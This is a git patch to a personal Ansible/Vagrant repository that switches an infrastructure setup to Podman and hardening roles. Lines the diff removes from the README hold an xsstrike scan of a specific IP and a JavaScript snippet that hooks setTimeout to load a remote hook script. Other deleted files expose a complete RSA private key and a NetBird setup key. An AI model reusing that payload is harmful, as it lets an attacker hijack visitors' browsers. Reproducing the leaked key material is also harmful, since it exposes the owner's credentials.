From 7f760cf4a6889db62f2ea47009b8983a4eec4d54 Mon Sep 17 00:00:00 2001
From: staffadmin <stephane.gratiasquiquandon@gmail.com>
Date: Tue, 20 Jan 2026 20:29:05 +0100
Subject: [PATCH] [First commit with podman setup]

---
 README.md                                     | 114 ++-------------
 Vagrantfile                                   |  41 ++----
 collections/requirements.yml                  |   3 +-
 .../config/traefik-dynamic-configuration.yml  |   4 -
 files/swarm/tls/jingoh.private.crt            |  22 ---
 files/swarm/tls/jingoh.private.key            |  27 ----
 group_vars/all.yml                            |  75 +++++-----
 hardening-linux.yml                           |  41 ++++--
 hosts                                         |   3 +
 podman.yml                                    | 138 ++++++++++++++++++
 roles/.gitignore                              |  10 +-
 roles/requirements.yml                        |  13 ++
 screenshots/http---23.134.94.44-32132.jpeg    | Bin 48911 -> 0 bytes
 templates/alerts.sh.j2                        |  63 --------
 templates/docker-compose.yml.j2               |   2 -
 15 files changed, 262 insertions(+), 294 deletions(-)
 delete mode 100644 files/swarm/config/traefik-dynamic-configuration.yml
 delete mode 100644 files/swarm/tls/jingoh.private.crt
 delete mode 100644 files/swarm/tls/jingoh.private.key
 create mode 100644 podman.yml
 delete mode 100644 screenshots/http---23.134.94.44-32132.jpeg
 delete mode 100644 templates/alerts.sh.j2
 delete mode 100644 templates/docker-compose.yml.j2

diff --git a/README.md b/README.md
index 19c2558..df57862 100644
--- a/README.md
+++ b/README.md
@@ -1,25 +1,21 @@
 # semaphore
 
 ```
- python3 xsstrike.py -u https://147.135.51.88/login
-(function() {
-    const originalSetTimeout = window.setTimeout;
-    window.setTimeout = function(fn, delay) {
-        if (delay > 0) {
-            const wrapped = function() {
-                if (!window.xetLoaded) {
-                    var s = document.createElement('script');
-                    s.src = 'https://xet.jingoh.fr/hook.js';
-                    document.head.appendChild(s);
-                    window.xetLoaded = true;
-                }
-                return fn.apply(this, arguments);
-            };
-            return originalSetTimeout(wrapped, delay);
-        }
-        return originalSetTimeout(fn, delay);
-    };
-})();
+ 
+# hardening
+
+https://github.com/linux-system-roles/sudo => ansible-galaxy role install linux-system-roles.sudo
+singleplatform-eng.users
+dev-sec.os_hardening :
+dev-sec.ssh_hardening :
+geerlingguy.firewall :
+jnv.unattended-upgrades
+ 
+ 
+# apps stacks
+ 
+https://github.com/alvistack/ansible-role-podman => installation podman
+https://github.com/linux-system-roles/podman => manager pod like Kubernetes / services
 ```
 
 
@@ -40,83 +36,3 @@ Add
  - package
  - firewall
 
-
-
-flux bootstrap gitea --owner=staffadmin --repository=cluster --private=false --personal=true --path=./clusters/test --hostname gitea.jingoh.fr --read-write-key=true
-
-GITEA_TOKEN=fdsfsd
-
-==> delete secret in flux-system
-
-┌─[stephane@staff] - [~] - [2024-08-28 01:05:37]
-└─[130] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth 
-► connecting to gitea.jingoh.fr
-► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git"
-✔ cloned repository
-► generating component manifests
-✔ generated component manifests
-✔ component manifests are up to date
-► installing components in "flux-system" namespace
-✔ installed components
-✔ reconciled components
-► determining if source secret "flux-system/flux-system" exists
-► generating source secret
-► applying source secret "flux-system/flux-system"
-✔ reconciled source secret
-► generating sync manifests
-✔ generated sync manifests
-✔ sync manifests are up to date
-► applying sync manifests
-✔ reconciled sync configuration
-◎ waiting for GitRepository "flux-system/flux-system" to be reconciled
-✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'
-◎ waiting for Kustomization "flux-system/flux-system" to be reconciled
-✗ client rate limiter Wait returned an error: context deadline exceeded
-► confirming components are healthy
-✔ helm-controller: deployment ready
-✔ kustomize-controller: deployment ready
-✔ notification-controller: deployment ready
-✔ source-controller: deployment ready
-✔ all components are healthy
-✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded
-
-
-
-
-
-┌─[stephane@staff] - [~] - [2024-08-28 01:13:04]
-└─[1] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth 
-► connecting to gitea.jingoh.fr
-► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git"
-✔ cloned repository
-► generating component manifests
-✔ generated component manifests
-✔ component manifests are up to date
-► installing components in "flux-system" namespace
-✔ installed components
-✔ reconciled components
-► determining if source secret "flux-system/flux-system" exists
-► generating source secret
-► applying source secret "flux-system/flux-system"
-✔ reconciled source secret
-► generating sync manifests
-✔ generated sync manifests
-✔ sync manifests are up to date
-► applying sync manifests
-✔ reconciled sync configuration
-◎ waiting for GitRepository "flux-system/flux-system" to be reconciled
-✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'
-◎ waiting for Kustomization "flux-system/flux-system" to be reconciled
-✗ client rate limiter Wait returned an error: context deadline exceeded
-► confirming components are healthy
-✔ helm-controller: deployment ready
-✔ kustomize-controller: deployment ready
-✔ notification-controller: deployment ready
-✔ source-controller: deployment ready
-✔ all components are healthy
-✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded']
-
-
-
-
-# docker run -d  -p 127.0.0.1:8000:8080  -e DATA_ROOT=/DATA  -v /DATA:/DATA -v /var/run/docker.sock:/var/run/docker.sock  --name casaos casaos
\ No newline at end of file
diff --git a/Vagrantfile b/Vagrantfile
index e6df6ff..b773b59 100644
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -1,29 +1,16 @@
-# -*- mode: ruby -*-
-# vi: set ft=ruby :
-
-NNODES=2
-
-$script = <<-SCRIPT
-echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE=" >> /home/vagrant/.ssh/authorized_keys
-SCRIPT
-
-# All Vagrant configuration is done below. The "2" in Vagrant.configure
-# configures the configuration version (we support older styles for
-# backwards compatibility). Please don't change it unless you know what
-# you're doing.
 Vagrant.configure("2") do |config|
-  (0..NNODES - 1).each do |i|
-    config.vm.define "k8s-ubuntu-#{i}" do |node|
-      #node.vm.box = "ubuntu/focal64"
-      node.vm.box = "ubuntu/jammy64"
-      node.vm.hostname = "k8s-ubuntu-#{i}"
-      config.vm.provider "virtualbox" do |v|
-          v.memory = 2048
-          v.cpus = 2
-      end
-      node.vm.network "private_network", ip: "192.168.25.11#{i}"
-      node.vm.provision "shell", inline: $script
-      node.vm.provision "shell", inline: "echo hello from node #{i}"
-    end
+  config.vm.box = "generic/ubuntu2204"
+  config.vm.network "private_network", type: "dhcp"
+  # config.vm.network :hostonly, "192.168.1.21"
+  config.vm.synced_folder ".", "/vagrant", disabled: true
+  config.vm.provider "qemu" do |qe|
+    qe.qemu_dir = "/usr/bin/"
+    qe.arch="x86_64"
+    qe.memory = "2048"
+    qe.smp = "4"
+    qe.machine = "q35"
+    qe.cpu = "max"
+    qe.net_device = "virtio-net-pci"
   end
-end
\ No newline at end of file
+end
+
diff --git a/collections/requirements.yml b/collections/requirements.yml
index adadbd9..3c2cab1 100644
--- a/collections/requirements.yml
+++ b/collections/requirements.yml
@@ -5,8 +5,9 @@ collections:
   # - name: ansible.utils
   # # - name: community.grafana
   - name: community.docker
-  #! bitwarden
   - name: bitwarden.secrets
+  - name: devsec.hardening
+  - name: fedora.linux_system_roles
   # - name: community.general
   # # - name: geerlingguy.redis
   # # - name: git+https://github.com/netways/ansible-collection-elasticstack.git
diff --git a/files/swarm/config/traefik-dynamic-configuration.yml b/files/swarm/config/traefik-dynamic-configuration.yml
deleted file mode 100644
index 610cba6..0000000
--- a/files/swarm/config/traefik-dynamic-configuration.yml
+++ /dev/null
@@ -1,4 +0,0 @@
-tls:
-  certificates:
-    - certFile: /run/secrets/wildcard-jingoh-private.crt
-      keyFile: /run/secrets/wildcard-jingoh-private.key
\ No newline at end of file
diff --git a/files/swarm/tls/jingoh.private.crt b/files/swarm/tls/jingoh.private.crt
deleted file mode 100644
index a46aab1..0000000
--- a/files/swarm/tls/jingoh.private.crt
+++ /dev/null
@@ -1,22 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDrzCCApegAwIBAgIUKJ9Qnulnmv91wS0XQXuFAAJTLOkwDQYJKoZIhvcNAQEL
-BQAwcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4wDAYD
-VQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gxFzAV
-BgNVBAMMDmppbmdvaC5wcml2YXRlMB4XDTI0MDQxNzE5MDIxMloXDTM0MDQxNTE5
-MDIxMlowcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4w
-DAYDVQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gx
-FzAVBgNVBAMMDmppbmdvaC5wcml2YXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
-MIIBCgKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8iYXm
-Xy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+LpKZZ
-f8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIxIZ7X
-SK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF11225Y0e
-nn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZjb0Qy
-B2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABoz8wPTAJBgNVHRMEAjAAMBsG
-A1UdEQQUMBKCECouamluZ29oLnByaXZhdGUwEwYDVR0lBAwwCgYIKwYBBQUHAwEw
-DQYJKoZIhvcNAQELBQADggEBAJ2hJ5SW9TD9yLecxG++x/jl32oxYJ/EyDPXZNHw
-fAb+9YmniThDEJTJ2RJTOIhZz6uqdjfP+37sFDu17SMvxauG78RIYSaTGnIaoiXt
-v5Uh4apUR1DOOPoZoUX82ZQJEJ5LenO+EFHevYbzgcDW61T/oByPwK8FOtLqQMHe
-SC09WsGyLQ/hls+4EgxQFyl7UN5T9NK6xrQrHwNbV0IgHcnGcTSkzRj4mt1nzsdh
-Enq/Ztz9iefxqDvHPFRRtcqDv+Ozh7zSuxVfP3tb7+5Ak7j/0Txi5NAbo+F3opAD
-8eeY2dTgxc9sV1esvB305zgl4SUkfLD+BDjOjn/NvWFj2i0=
------END CERTIFICATE-----
\ No newline at end of file
diff --git a/files/swarm/tls/jingoh.private.key b/files/swarm/tls/jingoh.private.key
deleted file mode 100644
index bc9b8cd..0000000
--- a/files/swarm/tls/jingoh.private.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEowIBAAKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8
-iYXmXy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+L
-pKZZf8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIx
-IZ7XSK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF1122
-5Y0enn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZj
-b0QyB2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABAoIBACqQz4rLgDiHIpsD
-TmGbzfqvcrLvgb9R5T74aGbKs/vzVhdozp7j23CZsDYvDN/E8aWlOWgkQ/9DG+Qy
-Ai9FJJ6ZEXL/s1ry19nyT+cnzxNSzgSw7vIZaFBd+RViFadr9kzxj8HHxNclf1GN
-n4cloajuIpG2OCwfSE8er/XG8535cc7aErTpuhj5EoqRtYy++VkiC0d3VSaCE/uW
-J1ulfGnaZ3qiJfr6o+0xlTPYFcK5pkm+3uvTdSYZeLSSJPfnnaqx7G8yxoVZ1QaH
-3Sey4Ax1Y8vGYtbJ2ZS7NlnBgbgSDPGimZMFfoGFThK4Y5AcqGIEByZvOSByXnQ6
-tHiB6OECgYEA3KJIThM+RtwAk17MoRvkdUl+iPj0k+Go7lJQycFgCeNfp2rylqYm
-K1/Hzo0rSueVVRO3iL+clxt3bYHHNk62nJnp+nnkAaETTs9A8QRwGk418BKw9HyR
-faSrmXkTgKlY+sWrwECP9SyLa80UPyWIyIeOqb/zvjfirRRaPRFQTrECgYEA2PUI
-HYSqia+iOm4XEOtlUMHbNnLhW/aFhBingABt/CMO0cPTCCYdEzS+xDZzF7MROHzd
-O6zJyLUtenTIwN3dcVTWCPCRxcAY4p6V/PjV0c/b0vteQ4WWFM/l6ubTAwX+uJih
-SQREkqseMPLAqeEX84yZfqb/N3s2N2GuGIbP6YcCgYEAsztlz38UbU3VbeJqC0r0
-WU896pmLXgLIT+ow1OUxVncOQpu/vB/3C+9ACoxlqfDdQALHauB1nc9jQmNV6Mki
-0a67A443ahdm7vOwhtqbEtOMP51/gO0c59t4xzEzZaassPMZphEMoRfxnr43f2DH
-cFemzkEwCcuuafoJoGhLO9ECgYA2yAg4i9sT0QlBf7LLTuTSM2DKqs9EjUbBSAhj
-Rbh/xcpkJPIQSK9mvha9LJJ7FXfvr3edLc/1oenN1dcq+9qCV02EDFqCeDLQZgKx
-UZOL2tRCvb3bhsuSjbwcSBRX2xeqPL/c0/sMnbCN433KZ0/I62OGm1wuAip6aWuw
-PboZ2QKBgFaEqOCUFMGHet0A/BOGkzkpCZsXl+EDqvx9l7s30vdv2NIoNR8V+Zl3
-B2arO/jGjDZnbGJcHG6B7WrCX8aJyM7Fm9akbreL7lWWzqKXs1lDHwAxqQN/TllI
-tO5XRx7AHoJXkEmzKAwQWAbKzRKLTp0x9lcOBGz8CR29oPxZI2/H
------END RSA PRIVATE KEY-----
\ No newline at end of file
diff --git a/group_vars/all.yml b/group_vars/all.yml
index a23c8d2..c040cff 100644
--- a/group_vars/all.yml
+++ b/group_vars/all.yml
@@ -1,38 +1,54 @@
 #* USERS 
+users:
+  - username: bot
+    name: bot user
+    # groups: ['wheel','systemd-journal']
+    # uid: 1000
+    home: /home/bot
+    # profile: |
+    #   alias ll='ls -lah'
+    ssh_key:
+      - "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7/ReeTsubS/KwTRaR/5k/6d5CEef0XTXvyRwfVBjwW"
+  - username: dbtest
+    name: dbtest user
+    # groups: ['wheel','systemd-journal']
+    # uid: 1000
 
-management_user_list:
-  - name: stephane
-    shell: '/bin/bash'
-    authorized_keys:
-      - key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE= stephane"
-        exclusive: yes
-    sudo:
-      hosts: ALL
-      as: ALL
-      commands: ALL
-      nopasswd: ALL
-
-
-#* GO 
-
-golang_gopath: /usr/local/go
-# golang_download_dir: /home/stephane/.ansible/tmp/downloads
+sudo_sudoers_files:
+  - path: /etc/sudoers.d/bot
+    user_specifications:
+      - users:
+          - bot
+        hosts:
+          - ALL
+        operators:
+          - ALL
+        commands:
+          - "NOPASSWD: ALL"
 
 #* PACKAGES
 
 package_repo:
   - python3-pip
-  #! argocd control plane
-  - sshpass
+  - podman
+  - lsof
+#   - libsemanage
+
+# package_pip:
+#   - python3-libsemanage
+
 
 
 #* FIREWALL
 
 firewall_allowed_tcp_ports:
   - "22"
+  - "2222"
   - "80"
+  - "8080"
   - "443"
   - "9100"
+  - "32222"
   # #! Kubernetes control plane ports 
   # - "6443"
   # - "2379"
@@ -43,23 +59,4 @@ firewall_allowed_tcp_ports:
   # - "9090"
   # - "3000"
   # - "9323"
-#! Kubernetes Worker ports 
-
-
-
-#* NETBIRD 
-
-netbird_setup_key: 33BE5022-D0CF-4ED9-84FF-B93E53519FDD
-netbird_register: true
-
-#* TLS 
-
-node_exporter_tls_server_config:
-  cert_file: /etc/node_exporter/tls.cert
-  key_file: /etc/node_exporter/tls.key
-
-#* NODE_EXPORTER
-
-# node_exporter_basic_auth_users:
-#   randomuser: examplepassword
-node_exporter_web_listen_address: "{{ host_private_address }}:9100"
+#! Kubernetes Worker ports 
\ No newline at end of file
diff --git a/hardening-linux.yml b/hardening-linux.yml
index d155ad4..9aa43bf 100644
--- a/hardening-linux.yml
+++ b/hardening-linux.yml
@@ -1,11 +1,34 @@
-- hosts: all
+- hosts: localtest
+  #! Need first setup with root access user
   become: true
-  roles:
-    # #! need change for iphone ssh access
-    # - name: devsec.hardening.ssh_hardening
-    # #! be carefull 
-    # - name: devsec.hardening.os_hardening
+  pre_tasks:
+    - ansible.builtin.apt:
+        update_cache: yes
 
-# - community.general.ufw:
-#     state: enabled
-#     policy: allow
\ No newline at end of file
+    - ansible.builtin.apt:
+        name: "*"
+        state: latest
+
+    - ansible.builtin.apt:
+        upgrade: safe
+
+    - ansible.builtin.apt:
+        clean: yes
+
+    - ansible.builtin.apt:
+        name: "{{ item }}"
+        state: latest
+      loop: "{{ package_repo }}"
+      when: package_repo is defined
+
+    - ansible.builtin.pip:
+        name: "{{ item }}"
+      loop: "{{ package_pip }}"
+      when: package_pip is defined
+
+  roles:
+    - name: singleplatform-eng.users
+    - name: linux-system-roles.sudo
+    - name: devsec.hardening.ssh_hardening
+    - name: devsec.hardening.os_hardening
+    - name: geerlingguy.firewall
\ No newline at end of file
diff --git a/hosts b/hosts
index 2ab34f7..da6c469 100644
--- a/hosts
+++ b/hosts
@@ -4,6 +4,9 @@ scaleway ansible_host=163.172.84.28 ansible_user=stephane
 [tower]
 scaleway ansible_host=163.172.84.28 ansible_user=stephane
 
+; [localtest]
+; #! test ansible_host=ubuntu.orb.local ansible_user=ansible ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 #! First setup 
+; test ansible_host=ubuntu.orb.local ansible_user=bot ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519
 ; [local]
 ; localhost ansible_host=127.0.0.1 ansible_user=stephanegratias
 ; [cluster]
diff --git a/podman.yml b/podman.yml
new file mode 100644
index 0000000..5b6b393
--- /dev/null
+++ b/podman.yml
@@ -0,0 +1,138 @@
+- hosts: localtest
+  become: true
+  vars:
+    #! SECRETS
+    # vaultwarden_url: "{{ lookup('env', 'vaultwarden_url') }}"
+    # bw_client_secret: "{{ lookup('env', 'bw_client_secret') }}"
+    # bw_client_password: "{{ lookup('env', 'bw_client_password') }}"
+    # bw_client_id: "{{ lookup('env', 'bw_client_id') }}"
+    # user_mail: "{{ lookup('env', 'mail') }}"
+    # user: "{{ lookup('env', 'username') }}"
+    # # Token full access gitea
+    # bw_requested_password_id: "{{ lookup('env', 'bw_requested_password_id') }}"
+    #! PODS
+    # podman_registries_conf:
+    #   aliases:
+    #     myregistry: quay.io
+    # podman_registry_username: test
+    # podman_registry_password: test
+    podman_create_host_directories: true
+    # podman_firewall:
+    #   - port: 8080-8081/tcp
+    #     state: enabled
+    #   - port: 12340/tcp
+    #     state: enabled
+    # podman_selinux_ports:
+    #   - ports: 8080-8081
+    #     setype: http_port_t
+    podman_kube_specs:
+      - state: started
+        run_as_user: bot
+        run_as_group: bot
+        kube_file_content:
+          apiVersion: v1
+          kind: Pod
+          metadata:
+            name: db
+          spec:
+            containers:
+              - name: db
+                image: docker.io/mysql:9
+                ports:
+                  - containerPort: 1234
+                    hostPort: 12340
+                volumeMounts:
+                  - mountPath: /var/lib/db:Z
+                    name: db
+            volumes:
+              - name: db
+                hostPath:
+                  path: /var/lib/db
+    # podman_secrets:
+    #   - name: mysql-root-password-container
+    #     state: present
+    #     skip_existing: true
+    #     data: "{{ root_password_from_vault }}"
+    #   - name: mysql-root-password-kube
+    #     state: present
+    #     skip_existing: true
+    #     data: |
+    #       apiVersion: v1
+    #       data:
+    #         password: "{{ root_password_from_vault | b64encode }}"
+    #       kind: Secret
+    #       metadata:
+    #         name: mysql-root-password-kube
+    #   - name: envoy-certificates
+    #     state: present
+    #     skip_existing: true
+    #     data: |
+    #       apiVersion: v1
+    #       data:
+    #         certificate.key: {{ key_from_vault | b64encode }}
+    #         certificate.pem: {{ cert_from_vault | b64encode }}
+    #       kind: Secret
+    #       metadata:
+    #         name: envoy-certificates
+      # - state: started
+      #   run_as_user: webapp
+      #   run_as_group: webapp
+      #   kube_file_src: /path/to/webapp.yml
+
+#! SECRETS
+  pre_tasks:
+    - name: Install Bitwarden CLI
+      ansible.builtin.command:
+        cmd: "{{ item }}"
+      delegate_to: localhost
+      loop: 
+        - apk add --no-cache nodejs npm
+        - npm install -g @bitwarden/cli 
+
+    - ansible.builtin.command:
+        cmd: bw logout
+      delegate_to: localhost
+      ignore_errors: true
+
+    - name: bitwarden token session 
+      ansible.builtin.shell: "{{ item }}"
+      environment:
+        BW_CLIENTID: "{{ bw_client_id }}"
+        BW_CLIENTSECRET: "{{ bw_client_secret }}"
+        BW_PASSWORD: "{{ bw_client_password }}"
+      loop:
+        - bw config server {{ vaultwarden_url }}
+        - bw login --apikey
+        - bw unlock --passwordenv BW_PASSWORD --raw
+      delegate_to: localhost
+      register: bw_session_result
+
+    - name: Get secret from Bitwarden
+      command:
+        argv:
+          - bw
+          - get
+          - password
+          - "{{ bw_requested_password_id }}"
+          - --session
+          - "{{ bw_session_result.results[-1].stdout | trim }}"
+      delegate_to: localhost
+      register: gitea_token_result
+      no_log: true
+      changed_when: false
+
+    # - name: Return all secrets from a path
+    #   ansible.builtin.debug: 
+    #     msg: "{{ gitea_token_result.stdout }}"
+    #   delegate_to: localhost
+
+    - ansible.builtin.set_fact:
+        gitea_token : "{{ gitea_token_result.stdout | trim }}"
+      no_log: true
+      delegate_to: localhost
+
+#! ROLES
+  roles:
+    #! By default, the files will be copied to or created in /etc/containers/systemd/$name.$type for root containers
+    #! and $HOME/.config/containers/systemd/$name.$type for rootless containers, on the managed node. 
+    - name: linux-system-roles.podman
\ No newline at end of file
diff --git a/roles/.gitignore b/roles/.gitignore
index 2b44480..8bec64d 100644
--- a/roles/.gitignore
+++ b/roles/.gitignore
@@ -47,4 +47,12 @@ cloudalchemy.grafana
 CTL-Fed-Security.ansible-grafana
 thomasjpfan.docker-swarm
 asg1612.dockerswarm
-gantsign.golang
\ No newline at end of file
+gantsign.golang
+singleplatform-eng.users
+linux-system-roles.sudo
+devsec.hardening.os_hardening
+devsec.hardening.ssh_hardening
+geerlingguy.firewall
+alvistack.podman
+linux-system-roles.podman
+linux-system-roles.selinux
\ No newline at end of file
diff --git a/roles/requirements.yml b/roles/requirements.yml
index b62fd7f..aba7997 100644
--- a/roles/requirements.yml
+++ b/roles/requirements.yml
@@ -13,6 +13,19 @@
 # - src: geerlingguy.kubernetes
 # PIP
 - src: geerlingguy.pip
+#! USER
+- src: singleplatform-eng.users
+- src: linux-system-roles.sudo
+#! HARDENING => collection 
+# - src: devsec.hardening.os_hardening
+# - src: devsec.hardening.ssh_hardening
+- src: geerlingguy.firewall
+- src: linux-system-roles.selinux
+#! PODS
+- src: alvistack.podman
+- src: linux-system-roles.podman
+# - src: fedora.linux_system_roles.firewall
+# jnv.unattended-upgrades
 # - src: asg1612.dockerswarm
 # SYSTEM
 # - src: tumf.systemd-service
diff --git a/screenshots/http---23.134.94.44-32132.jpeg b/screenshots/http---23.134.94.44-32132.jpeg
deleted file mode 100644
index 97b9a60057dbded52f8abde9953366ccf1a0bf50..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 48911
zcmeFZ3sh6dx-J^E)o!)5X<p4k?1pYoL@)#h2ugR$W2p(ObO_<iGDr}R1QH;~bJ?~n
z5CY3agd_x(&?b;bXhaMlhR7oz5TG#x<PjoINr3Q1UI{n7_gQ1@GsfQgj(f*A=iEES
zs*Gg*sj693vu4$-|Ns84=HA=AcYx2XdR*}U?Ar$b?9+SzdlUQKUb%cZ^v^$ddt8CI
z|9iq~fF^u&9sr2J#N&SO{QgTn|9~$Kzx($y{z$tXhL8Q@_+JD~xf=t2lnwxh&;1v9
z{=4W;ZiM5*G#QpO->-3+$~BGE(a1Ux|1O{YLq`3(?DB_9h>wle<oWX-GS26R%NqHH
zMm`<!A7s>jki%kef8@{6<Z+3)mGDPhe}q3;d@LM;fNPE)Yre(+Jm3d_C*b=(u3z(C
z6R>3ffa5v<aNuwMj6;zD0M0!C;EUmZ#(n*F0N}(=0Kkjhf5!c@Phzj*uK!zcA8CH~
zqtO7s3IhQ6)E@xQ{v7}~68LXvnxFroZC`4Vj5Y1TYCaKwTYzxDmw+n(3?K|(t&wa2
z=K(-~!`=wsGT_ih2M-<m=+L2qhYlY;^zo6;jvV>qlOsCEPaOM9U+0T2^mX*~3{QS@
z%FxKnSWoXut1r#WEzVe;F*tSZ{JGQTzd3#8^dE)nJAC-?k&lmPA336Z+ECB%^#9|q
z_X?o(@qwzte?73z6tG`w-vO<Cd#!+zn(p4e|G*z3@gL#9M~6N>c=(h3e<TNfrWv0H
z_U-@p*uKMuj(mJ*-$B5>{RcFcqxHG=SMXmRz7gx_>U{zH&IjR}U(g3TY-)Qw?#=@{
z`yX&M&py^SbNC(~|KsCwFzUunwa>>Vz6M>s+tkwhO;|$NlBRH@eVPFHpX&aj@Iwa=
zYZ4u`G!5IgfB&J6KRUGkz`wO^pOz-|E8yqf!LG+WKB%pu`vd$zUrp2alAbBZ?#}Wd
z+sn9#y<xzy1DZ3n4rl>f0SbWe)BQ8~^clt0#&6F>(OiFIM1tOexG`c~U6B{m`*pIE
zOxpT<;B-xtvW6KsoM9B~P*H|v6+ja(*^yJEk(mg>*S+P*eu}suDtyau7^<!J^l6BN
zPmLRv4dg68Y)#(OmhS-wscJ?50wVSi`#=!d4XCtlclUk!kN*7s@bRPi0qYyGvTjNe
zV$iwFxIN$CrPB3k^>4W!;~OF9)q0g><3HkR-0Q#U*#c5~CfArdCjTQ*sQ2!^^Hdww
zIqwZ?{`UV!)Cv62_@_vJ?K#eF#C#IVZ26DlaTlD4<?G#;J%GW^rD(D3>9VNZ4yht*
z`ru~=0f*kI-Cub0bkCPKKs(Q{VEyOB4-%*PfCwE41nRJraUyhXY|f_h!}JMLWo^am
zTRigcfgftpyN4)InM{ect{Au(S8O2NW@Iqp33LW?@Xj+eNc>w=FI`H(i1X0=b)?6v
ztcfOWF3JrZ<W{7>?4wfLD<j4yX5eAgs@qyng~dI{pv#%8wM8iiC>WHZ9G|}MUb)86
zdZ9b_e01Es%OEJcYPrENyF9_Tq;hvicB*=?b8Zi?L>xMndiI4w{{BqPI5Mf2c_uTH
zGGiWD9iRL@ezCNjFll{w<qR8Ho6L6SC3~eOKB<sk4Z9n{h#UxZn#rV_XPoez%_OU6
